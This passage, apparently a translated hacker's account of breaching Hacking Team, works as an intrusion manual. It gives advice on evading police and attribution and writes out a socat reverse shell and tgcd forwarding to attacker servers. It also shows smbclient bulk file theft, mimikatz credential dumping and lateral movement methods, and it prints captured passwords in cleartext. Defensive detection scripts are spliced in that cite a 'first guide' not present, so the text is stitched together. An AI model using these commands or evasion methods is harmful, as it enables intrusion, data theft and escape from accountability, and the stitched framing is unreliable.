    [1] http://pastebin.com/raw.php?i=cRYvK4jb
    [2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
    [3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
    [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
    [5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group

    –[ 2 – Hacking Team ]———————————————————-

    Hacking Team was a company that helped governments hack and spy on
    journalists, activists, political opposition, and other threats to their power
    [1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
    and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
    fascist slogan “boia chi molla”. It’d be more correct to say “boia chi vende
    RCS”. They also claimed to have technology to solve the “problem” posed by Tor
    and the darknet [13]. But seeing as I’m still free, I have my doubts about
    its effectiveness.

    [1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
    [2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
    [3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
    [4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
    [5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
    [6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
    [7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
    [8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
    [9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
    [10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
    [11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
    [12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
    [13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

    –[ 3 – Stay safe out there ]—————————————————

    Unfortunately, our world is backwards. You get rich by doing bad things and go
    to jail for doing good. Fortunately, thanks to the hard work of people like
    the Tor project [1], you can avoid going to jail by taking a few simple
    precautions:

    1) Encrypt your hard disk [2]

    I guess when the police arrive to seize your computer, it means you’ve
    already made a lot of mistakes, but it’s better to be safe.

    2) Use a virtual machine with all traffic routed through Tor

    This accomplishes two things. First, all your traffic is anonymized through
    Tor. Second, keeping your personal life and your hacking on separate
    computers helps you not to mix them by accident.

    You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
    something custom [6]. Here’s [7] a detailed comparison.

    3) (Optional) Don’t connect directly to Tor

    Tor isn’t a panacea. They can correlate the times you’re connected to Tor
    with the times your hacker handle is active. Also, there have been
    successful attacks against Tor [8]. You can connect to Tor using other
    peoples’ wifi. Wifislax [9] is a linux distro with a lot of tools for
    cracking wifi. Another option is to connect to a VPN or a bridge node [10]
    before Tor, but that’s less secure because they can still correlate the
    hacker’s activity with your house’s internet activity (this was used as
    evidence against Jeremy Hammond [11]).

    The reality is that while Tor isn’t perfect, it works quite well. When I
    was young and reckless, I did plenty of stuff without any protection (I’m
    referring to hacking) apart from Tor, that the police tried their hardest
    to investigate, and I’ve never had any problems.

    [1] https://www.torproject.org/
    [2] https://info.securityinabox.org/es/chapter-4
    [3] https://www.whonix.org/
    [4] https://tails.boum.org/
    [5] https://www.qubes-os.org/doc/privacy/torvm/
    [6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
    [7] https://www.whonix.org/wiki/Comparison_with_Others
    [8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
    [9] http://www.wifislax.com/
    [10] https://www.torproject.org/docs/bridges.html.en
    [11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html

    —-[ 3.1 – Infrastructure ]—————————————————-

    I don’t hack directly from Tor exit nodes. They’re on blacklists, they’re
    slow, and they can’t receive connect-backs. Tor protects my anonymity while I
    connect to the infrastructure I use to hack, which consists of:

    1) Domain Names

    For C&C addresses, and for DNS tunnels for guaranteed egress.

    2) Stable Servers

    For use as C&C servers, to receive connect-back shells, to launch attacks,
    and to store the loot.

    3) Hacked Servers

    For use as pivots to hide the IP addresses of the stable servers. And for
    when I want a fast connection without pivoting, for example to scan ports,
    scan the whole internet, download a database with sqli, etc.

    Obviously, you have to use an anonymous payment method, like bitcoin (if it’s
    used carefully).

    —-[ 3.2 – Attribution ]——————————————————-

    In the news we often see attacks traced back to government-backed hacking
    groups (“APTs”), because they repeatedly use the same tools, leave the same
    footprints, and even use the same infrastructure (domains, emails, etc).
    They’re negligent because they can hack without legal consequences.

    I didn’t want to make the police’s work any easier by relating my hack of
    Hacking Team with other hacks I’ve done or with names I use in my day-to-day
    work as a blackhat hacker. So, I used new servers and domain names, registered
    with new emails, and paid for with new bitcoin addresses. Also, I only used
    tools that are publicly available, or things that I wrote specifically for
    this attack, and I changed my way of doing some things to not leave my usual
    forensic footprint.

    –[ 4 – Information Gathering ]————————————————-

    Although it can be tedious, this stage is very important, since the larger the
    attack surface, the easier it is to find a hole somewhere in it.

    —-[ 4.1 – Technical Information ]———————————————

    Some tools and techniques are:

    1) Google

    A lot of interesting things can be found with a few well-chosen search
    queries. For example, the identity of DPR [1]. The bible of Google hacking
    is the book “Google Hacking for Penetration Testers”. You can find a short
    summary in Spanish at [2].

    2) Subdomain Enumeration

    Often, a company’s main website is hosted by a third party, and you’ll find
    the company’s actual IP range thanks to subdomains like mx.company.com or
    ns1.company.com. Also, sometimes there are things that shouldn’t be exposed
    in “hidden” subdomains. Useful tools for discovering domains and subdomains
    are fierce [3], theHarvester [4], and recon-ng [5].

    3) Whois lookups and reverse lookups

    With a reverse lookup using the whois information from a domain or IP range
    of a company, you can find other domains and IP ranges. As far as I know,
    there’s no free way to do reverse lookups aside from a google “hack”:

    "via della moscova 13" site:www.findip-address.com
    "via della moscova 13" site:domaintools.com

    4) Port scanning and fingerprinting

    Unlike the other techniques, this talks to the company’s servers. I
    include it in this section because it’s not an attack, it’s just
    information gathering. The company’s IDS might generate an alert, but you
    don’t have to worry since the whole internet is being scanned constantly.

    For scanning, nmap [6] is precise, and can fingerprint the majority of
    services discovered. For companies with very large IP ranges, zmap [7] or
    masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
    sites.

    [1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
    [2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
    [3] http://ha.ckers.org/fierce/
    [4] https://github.com/laramies/theHarvester
    [5] https://bitbucket.org/LaNMaSteR53/recon-ng
    [6] https://nmap.org/
    [7] https://zmap.io/
    [8] https://github.com/robertdavidgraham/masscan
    [9] http://www.morningstarsecurity.com/research/whatweb
    [10] http://blindelephant.sourceforge.net/
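
Both guides rely on the same sorting step: subdomains and whois netblocks tell you which hosts an organisation actually operates and which sit with a hosting provider (the academi.com walkthrough in the first guide, and point 2 of this section). As an added Python example, not from either guide, here is that step done programmatically from the defender's side, as the core of an external asset inventory: given enumeration output and your own registered netblocks, it separates hosts you are responsible for from hosts a third party runs, and groups the latter by /24 so each foreign range can be taken to whois in turn. The sample host lines are the ones listed in the first guide's academi.com walkthrough, the netblock is the CIDR from its whois output, one malformed line is added to show it being skipped, and the function names are constructed for the illustration.

```python
# Added example (not from either guide): sort DNS enumeration results by
# whether each IP sits inside the organisation's own whois netblocks, and
# group the remainder by /24 so each foreign range can be looked up in turn.
import ipaddress

# Netblock from the whois record quoted in the first guide ("CIDR: 67.238.84.224/27").
OWN_NETBLOCKS = ["67.238.84.224/27"]

# Sample "IP hostname" lines in the form fierce and similar tools print.  The
# values are the ones listed in the academi.com walkthrough; the last line is
# a constructed malformed entry to show it being skipped.
SAMPLE_HOSTS = """\
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
not-an-ip bogus.example
"""


def parse_host_lines(text):
    """Yield (ip_address, hostname) pairs, skipping blank or malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        try:
            yield ipaddress.ip_address(parts[0]), parts[1]
        except ValueError:
            continue  # first field is not an IP literal


def classify_hosts(text, netblocks=OWN_NETBLOCKS):
    """Split hostnames into those inside our netblocks ("own") and those
    hosted elsewhere ("third_party"), preserving input order."""
    nets = [ipaddress.ip_network(n) for n in netblocks]
    result = {"own": [], "third_party": []}
    for ip, host in parse_host_lines(text):
        bucket = "own" if any(ip in n for n in nets) else "third_party"
        result[bucket].append(host)
    return result


def foreign_ranges(text, netblocks=OWN_NETBLOCKS, prefix=24):
    """Group third-party hosts by their /prefix so each range can be taken to
    whois; in the guide the 54.x ranges turned out to be Amazon-hosted and
    academiproshop.com was not the organisation's at all."""
    nets = [ipaddress.ip_network(n) for n in netblocks]
    groups = {}
    for ip, host in parse_host_lines(text):
        if any(ip in n for n in nets):
            continue
        key = str(ipaddress.ip_network("%s/%d" % (ip, prefix), strict=False))
        groups.setdefault(key, []).append(host)
    return groups


if __name__ == "__main__":
    for bucket, hosts in classify_hosts(SAMPLE_HOSTS).items():
        print(bucket, hosts)
    for net, hosts in foreign_ranges(SAMPLE_HOSTS).items():
        print(net, hosts)
```

Hosts in the "third_party" bucket are not out of scope, they are the ones whose operator, contract and patching you have to find out about separately; that is the same realisation the guide reaches about academiproshop.com, seen from the other side.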

    —-[ 4.2 – Social Information ]————————————————

    For social engineering, it’s useful to have information about the employees,
    their roles, contact information, operating system, browser, plugins,
    software, etc. Some resources are:

    1) Google

    Here as well, it’s the most useful tool.

    2) theHarvester and recon-ng

    I already mentioned them in the previous section, but they have a lot more
    functionality. They can find a lot of information quickly and
    automatically. It’s worth reading all their documentation.

    3) LinkedIn

    A lot of information about the employees can be found here. The company’s
    recruiters are the most likely to accept your connection requests.

    4) Data.com

    Previously known as jigsaw. They have contact information for many
    employees.

    5) File Metadata

    A lot of information about employees and their systems can be found in
    metadata of files the company has published. Useful tools for finding
    files on the company’s website and extracting the metadata are metagoofil
    [1] and FOCA [2].

    [1] https://github.com/laramies/metagoofil
    [2] https://www.elevenpaths.com/es/labstools/foca-2/index.html

    –[ 5 – Entering the network ]————————————————–

    There are various ways to get a foothold. Since the method I used against
    Hacking Team is uncommon and a lot more work than is usually necessary, I’ll
    talk a little about the two most common ways, which I recommend trying first.

    —-[ 5.1 – Social Engineering ]————————————————

    Social engineering, specifically spear phishing, is responsible for the
    majority of hacks these days. For an introduction in Spanish, see [1]. For
    more information in English, see [2] (the third part, “Targeted Attacks”). For
    fun stories about the social engineering exploits of past generations, see
    [3]. I didn’t want to try to spear phish Hacking Team, as their whole business
    is helping governments spear phish their opponents, so they’d be much more
    likely to recognize and investigate a spear phishing attempt.

    [1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
    [2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
    [3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

    —-[ 5.2 – Buying Access ]—————————————————–

    Thanks to hardworking Russians and their exploit kits, traffic sellers, and
    bot herders, many companies already have compromised computers in their
    networks. Almost all of the Fortune 500, with their huge networks, have some
    bots already inside. However, Hacking Team is a very small company, and most
    of its employees are infosec experts, so there was a low chance that they’d
    already been compromised.

    —-[ 5.3 – Technical Exploitation ]——————————————–

    After the Gamma Group hack, I described a process for searching for
    vulnerabilities [1]. Hacking Team had one public IP range:
    inetnum: 93.62.139.32 – 93.62.139.47
    descr: HT public subnet

    Hacking Team had very little exposed to the internet. For example, unlike
    Gamma Group, their customer support site needed a client certificate to
    connect. What they had was their main website (a Joomla blog in which Joomscan
    [2] didn’t find anything serious), a mail server, a couple routers, two VPN
    appliances, and a spam filtering appliance. So, I had three options: look for
    a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
    embedded devices. A 0day in an embedded device seemed like the easiest option,
    and after two weeks of work reverse engineering, I got a remote root exploit.
    Since the vulnerabilities still haven’t been patched, I won’t give more
    details, but for more information on finding these kinds of vulnerabilities,
    see [3] and [4].

    [1] http://pastebin.com/raw.php?i=cRYvK4jb
    [2] http://sourceforge.net/projects/joomscan/
    [3] http://www.devttys0.com/
    [4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A

    –[ 6 – Be Prepared ]———————————————————–

    I did a lot of work and testing before using the exploit against Hacking Team.
    I wrote a backdoored firmware, and compiled various post-exploitation tools
    for the embedded device. The backdoor serves to protect the exploit. Using the
    exploit just once and then returning through the backdoor makes it harder to
    identify and patch the vulnerabilities.

    The post-exploitation tools that I’d prepared were:

    1) busybox

    For all the standard Unix utilities that the system didn’t have.

    2) nmap

    To scan and fingerprint Hacking Team’s internal network.

    3) Responder.py

    The most useful tool for attacking windows networks when you have access to
    the internal network, but no domain user.

    4) Python

    To execute Responder.py

    5) tcpdump

    For sniffing traffic.

    6) dsniff

    For sniffing passwords from plaintext protocols like ftp, and for
    arpspoofing. I wanted to use ettercap, written by Hacking Team’s own ALoR
    and NaGA, but it was hard to compile it for the system.

    7) socat

    For a comfortable shell with a pty:
    my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
    hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
    tcp:my_server:my_port

    And useful for a lot more, it’s a networking swiss army knife. See the
    examples section of its documentation.

    8) screen

    Like the shell with pty, it wasn’t really necessary, but I wanted to feel
    at home in Hacking Team’s network.

    9) a SOCKS proxy server

    To use with proxychains to be able to access their local network from any
    program.

    10) tgcd

    For forwarding ports, like for the SOCKS server, through the firewall.

    [1] https://www.busybox.net/
    [2] https://nmap.org/
    [3] https://github.com/SpiderLabs/Responder
    [4] https://github.com/bendmorris/static-python
    [5] http://www.tcpdump.org/
    [6] http://www.monkey.org/~dugsong/dsniff/
    [7] http://www.dest-unreach.org/socat/
    [8] https://www.gnu.org/software/screen/
    [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
    [10] http://tgcd.sourceforge.net/

    The worst thing that could happen would be for my backdoor or post-exploitation
    tools to make the system unstable and cause an employee to investigate. So I
    spent a week testing my exploit, backdoor, and post-exploitation tools in the
    networks of other vulnerable companies before entering Hacking Team’s network.

    –[ 7 – Watch and Listen ]——————————————————

    Now inside their internal network, I wanted to take a look around and think
    about my next step. I started Responder.py in analysis mode (-A to listen
    without sending poisoned responses), and did a slow scan with nmap.

    –[ 8 – NoSQL Databases ]——————————————————-

    NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
    community [1]. Just when I was worried that they’d finally patched all of the
    authentication bypass bugs in MySQL [2][3][4][5], new databases came into
    style that lack authentication by design. Nmap found a few in Hacking Team’s
    internal network:

    27017/tcp open mongodb MongoDB 2.6.5
    | mongodb-databases:
    |   ok = 1
    |   totalSizeMb = 47547
    |   totalSize = 49856643072
    |_  version = 2.6.5

    27017/tcp open mongodb MongoDB 2.6.5
    | mongodb-databases:
    |   ok = 1
    |   totalSizeMb = 31987
    |   totalSize = 33540800512
    |   databases
    |_  version = 2.6.5

    They were the databases for test instances of RCS. The audio that RCS records
    is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
    from this. They were spying on themselves without meaning to.

    [1] https://www.shodan.io/search?query=product%3Amongodb
    [2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
    [3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
    [4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
    [5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
    [6] https://ht.transparencytoolkit.org/audio/

    –[ 9 – Crossed Cables ]——————————————————–

    Although it was fun to listen to recordings and see webcam images of Hacking
    Team developing their malware, it wasn’t very useful. Their insecure backups
    were the vulnerability that opened their doors. According to their
    documentation [1], their iSCSI devices were supposed to be on a separate
    network, but nmap found a few in their subnetwork 192.168.1.200/24:

    Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)

    3260/tcp open iscsi?
    | iscsi-info:
    | Target: iqn.2000-01.com.synology:ht-synology.name
    | Address: 192.168.200.66:3260,0
    |_ Authentication: No authentication required

    Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)

    3260/tcp open iscsi?
    | iscsi-info:
    | Target: iqn.2000-01.com.synology:synology-backup.name
    | Address: 10.0.1.72:3260,0
    | Address: 192.168.200.72:3260,0
    |_ Authentication: No authentication required
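    As an added defender-side example that is not part of the original guide, the following Python script parses nmap normal output of the kind shown above (and in the MongoDB section before it) and flags iSCSI targets exported without authentication and MongoDB instances that listed their databases without credentials. The hostnames and addresses in the sample are constructed placeholders.

```python
"""Flag unauthenticated iSCSI targets and MongoDB instances in nmap output.

Added example, not part of the original guide. The sample output below is
constructed (hostnames and addresses are placeholders) but follows the layout
of nmap's normal output with the iscsi-info and mongodb-databases scripts.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SAMPLE_NMAP = """\
Nmap scan report for nas01.example.local (10.0.0.5)
3260/tcp  open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas01.name
|     Address: 10.0.0.5:3260,0
|_    Authentication: No authentication required

Nmap scan report for db01.example.local (10.0.0.9)
27017/tcp open  mongodb MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|_  version = 2.6.5

Nmap scan report for nas02.example.local (10.0.0.6)
3260/tcp  open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas02.name
|     Address: 10.0.0.6:3260,0
|_    Authentication: required

Nmap scan report for db02.example.local (10.0.0.10)
27017/tcp open  mongodb MongoDB 3.4.2
| mongodb-databases:
|   errmsg = not authorized on admin to execute command
|_  ok = 0
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+(\S+)")
SCRIPT_RE = re.compile(r"^\|_?\s*([\w-]+):\s*$")            # "| iscsi-info:"
KV_RE = re.compile(r"^\|_?\s*([^:=]+?)\s*[:=]\s*(.+?)\s*$")  # "|   ok = 1"


@dataclass
class Finding:
    host: str
    port: int
    service: str
    reason: str


def parse_nmap_text(text: str) -> List[Finding]:
    """Walk nmap normal output; return one Finding per unauthenticated data service."""
    findings: List[Finding] = []
    host: Optional[str] = None
    port, service, script = 0, "", ""
    kv: Dict[str, str] = {}

    def flush() -> None:
        # Evaluate the script block collected so far, then reset it.
        nonlocal script, kv
        auth = kv.get("Authentication", "").lower()
        if script == "iscsi-info" and auth.startswith("no authentication"):
            findings.append(Finding(host or "?", port, service,
                                    f"iSCSI target {kv.get('Target', '?')} exported without CHAP"))
        elif script == "mongodb-databases" and kv.get("ok") == "1":
            # listDatabases only succeeds anonymously when authorization is off.
            findings.append(Finding(host or "?", port, service,
                                    "MongoDB listed its databases without credentials"))
        script, kv = "", {}

    for line in text.splitlines():
        if m := HOST_RE.match(line):
            flush()
            host = m.group(1)
        elif m := PORT_RE.match(line):
            flush()
            port, service = int(m.group(1)), m.group(2)
        elif m := SCRIPT_RE.match(line):
            flush()
            script = m.group(1)
        elif m := KV_RE.match(line):
            kv[m.group(1)] = m.group(2)
    flush()
    return findings


if __name__ == "__main__":
    for f in parse_nmap_text(SAMPLE_NMAP):
        print(f"{f.host}:{f.port} ({f.service}) - {f.reason}")
```

    The two hosts it reports are the ones a network owner would fix by enabling CHAP on the iSCSI target and turning on MongoDB authorization.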

    iSCSI needs a kernel module, and it would’ve been difficult to compile it for
    the embedded system. I forwarded the port so that I could mount it from a VPS:

    VPS: tgcd -L -p 3260 -q 42838
    Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

    VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

    Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
    because it thinks its IP is 192.168.200.72 instead of 127.0.0.1

    The way I solved it was:
    iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

    And now, after:
    iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

    …the device file appears! We mount it:
    vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

    and find backups of various virtual machines. The Exchange server seemed like
    the most interesting. It was too big to download, but it was possible to
    mount it remotely to look for interesting files:
    $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
    $ fdisk -l /dev/loop0
    /dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

    so the offset is 2048 * 512 = 1048576
    $ losetup -o 1048576 /dev/loop1 /dev/loop0
    $ mount -o ro /dev/loop1 /mnt/exchange/

    now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
    we find the hard disk of the VM, and mount it:
    vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
    mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

    …and finally we’ve unpacked the Russian doll and can see all the files from
    the old Exchange server in /mnt/part1

    [1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf

    –[ 10 – From backups to domain admin ]—————————————–

    What interested me most in the backup was seeing if it had a password or hash
    that could be used to access the live server. I used pwdump, cachedump, and
    lsadump [1] on the registry hives. lsadump found the password to the besadmin
    service account:

    _SC_BlackBerry MDS Connection Service
    0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
    0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........

    I used proxychains [2] with the socks server on the embedded device and
    smbclient [3] to check the password:
    proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

    It worked! The password for besadmin was still valid, and a local admin. I
    used my proxy and metasploit’s psexec_psh [4] to get a meterpreter session.
    Then I migrated to a 64 bit process, ran “load kiwi” [5], “creds_wdigest”, and
    got a bunch of passwords, including the Domain Admin's.

    [1] https://github.com/Neohapsis/creddump7
    [2] http://proxychains.sourceforge.net/
    [3] https://www.samba.org/
    [4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
    [5] https://github.com/gentilkiwi/mimikatz

    --[ 11 - Downloading the mail ]-------------------------------------------------

    With the Domain Admin password, I have access to the email, the heart of the
    company. Since with each step I take there's a chance of being detected, I
    start downloading their email before continuing to explore. Powershell makes
    it easy [1]. Curiously, I found a bug with Powershell's date handling. After
    downloading the emails, it took me another couple weeks to get access to the
    source code and everything else, so I returned every now and then to download
    the new emails. The server was Italian, with dates in the format
    day/month/year. I used:
    -ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

    with New-MailboxExportRequest to download the new emails (in this case all
    mail since June 5). The problem is it says the date is invalid if you try a
    day larger than 12 (I imagine because in the US the month comes first and
    you can't have a month above 12). It seems like Microsoft's engineers only
    test their software with their own locale.
    [1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/

    --[ 12 - Downloading Files ]----------------------------------------------------

    Now that I'd gotten Domain Admin, I started to download file shares using my
    proxy and the -Tc option of smbclient, for example:
    proxychains smbclient '//192.168.1.230/FAE DiskStation' \
    -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

    I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
    the torrent like that.

    --[ 13 - Introduction to hacking windows domains ]------------------------------

    Before continuing with the story of the "weones culiaos" (Hacking Team), I
    should give some general knowledge for hacking windows networks.

    ----[ 13.1 - Lateral Movement ]-------------------------------------------------

    I'll give a brief review of the different techniques for spreading within a
    windows network. The techniques for remote execution require the password or
    hash of a local admin on the target. By far, the most common way of obtaining
    those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
    and sekurlsa::msv, on the computers where you already have admin access. The
    techniques for "in place" movement also require administrative privileges
    (except for runas). The most important tools for privilege escalation are
    PowerUp [2], and bypassuac [3].

    [1] https://adsecurity.org/?page_id=1821
    [2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
    [3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1

    Remote Movement:

    1) psexec

    The tried and true method for lateral movement on windows. You can use psexec
    [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
    invoke_psexec [4], or the builtin windows command "sc" [5]. For the
    metasploit module, powershell empire, and pth-winexe [6], you just need the
    hash, not the password.
    It's the most universal method (it works on any windows computer with port
    445 open), but it's also the least stealthy. Event ID 7045 from the "Service
    Control Manager" source will appear in the System event log. In my
    experience, no one has ever noticed during a hack, but it helps the
    investigators piece together what the hacker did afterwards.

    2) WMI

    The most stealthy method. The WMI service is enabled on all windows
    computers, but except for servers, the firewall blocks it by default. You can
    use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and
    pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
    wmic [5]. All except wmic just need the hash.

    3) PSRemoting [10]

    It's disabled by default, and I don't recommend enabling new protocols. But,
    if the sysadmin has already enabled it, it's very convenient, especially if
    you use powershell for everything (and you should use powershell for almost
    everything; it will change [11] with powershell 5 and windows 10, but for now
    powershell makes it easy to do everything in RAM, avoid AV, and leave a small
    footprint).

    4) Scheduled Tasks

    You can execute remote programs with at and schtasks [5]. It works in the
    same situations where you could use psexec, and it also leaves a well known
    footprint [12].

    5) GPO

    If all those protocols are disabled or blocked by the firewall, once you're
    Domain Admin, you can use GPO to give users a login script, install an msi,
    execute a scheduled task [13], or, like we'll see with the computer of Mauro
    Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and open the
    firewall.
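    As an added defender-side example that is not part of the original guide, the following Python triage runs over constructed Event ID 7045 records and shows the footprint the psexec-style methods above leave: a service named after a known remote-execution tool, or a service whose binary is a %COMSPEC% launcher running Base64-encoded PowerShell. The service names, paths and the encoded blob in the sample are constructed placeholders.

```python
"""Triage Windows System-log Event ID 7045 ("a service was installed") records
for the service-based lateral movement footprint described above.

Added example, not part of the original guide. The records are constructed;
real ones come from the System log (wevtutil, Get-WinEvent or a SIEM) and carry
the same ServiceName / ImagePath / AccountName fields.
"""
import re
from typing import Dict, List

# Constructed sample: four service installs, two of them benign.
SAMPLE_7045_EVENTS: List[Dict[str, str]] = [
    {"ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "PSEXESVC",                # name used by Sysinternals PsExec
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "kXtqLbFz",                # random name, Base64 PowerShell payload
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden "
                  "-encodedcommand QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB",  # placeholder blob
     "AccountName": "LocalSystem"},
    {"ServiceName": "MyBackupAgent",
     "ImagePath": r"C:\Program Files\Backup\agent.exe",
     "AccountName": r"NT AUTHORITY\NetworkService"},
]

# Service names installed by common remote-execution tools (PsExec, winexe).
KNOWN_TOOL_SERVICES = {"psexesvc", "winexesvc"}
ENCODED_POWERSHELL = re.compile(
    r"powershell(?:\.exe)?.*?\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)
COMSPEC_LAUNCHER = re.compile(r"^%COMSPEC%\s+/b\s+/c\s+start\b", re.I)


def looks_random(name: str) -> bool:
    """Heuristic: 8-16 letters with almost no vowels, like generated service names."""
    if not re.fullmatch(r"[A-Za-z]{8,16}", name):
        return False
    vowels = sum(c in "aeiouAEIOU" for c in name)
    return vowels / len(name) < 0.2


def triage_7045_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons (empty if none) this install deserves an analyst's look."""
    reasons: List[str] = []
    name, image = event["ServiceName"], event["ImagePath"]
    if name.lower() in KNOWN_TOOL_SERVICES:
        reasons.append("service name of a known remote-execution tool")
    if ENCODED_POWERSHELL.search(image):
        reasons.append("image path runs Base64-encoded PowerShell")
    if COMSPEC_LAUNCHER.search(image):
        reasons.append("image path is a %COMSPEC% launcher, not a service binary")
    if looks_random(name):
        reasons.append("random-looking service name")
    return reasons


def triage_7045(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each suspicious ServiceName to its reasons, keeping log order."""
    result: Dict[str, List[str]] = {}
    for event in events:
        reasons = triage_7045_event(event)
        if reasons:
            result[event["ServiceName"]] = reasons
    return result


if __name__ == "__main__":
    for name, reasons in triage_7045(SAMPLE_7045_EVENTS).items():
        print(f"{name}: {'; '.join(reasons)}")
```

    The same records, correlated with the 4624 logon that preceded them, are what the investigators mentioned above use to rebuild the path an intruder took.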
    [1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
    [2] https://sourceforge.net/projects/winexe/
    [3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
    [4] http://www.powershellempire.com/?page_id=523
    [5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
    [6] https://github.com/byt3bl33d3r/pth-toolkit
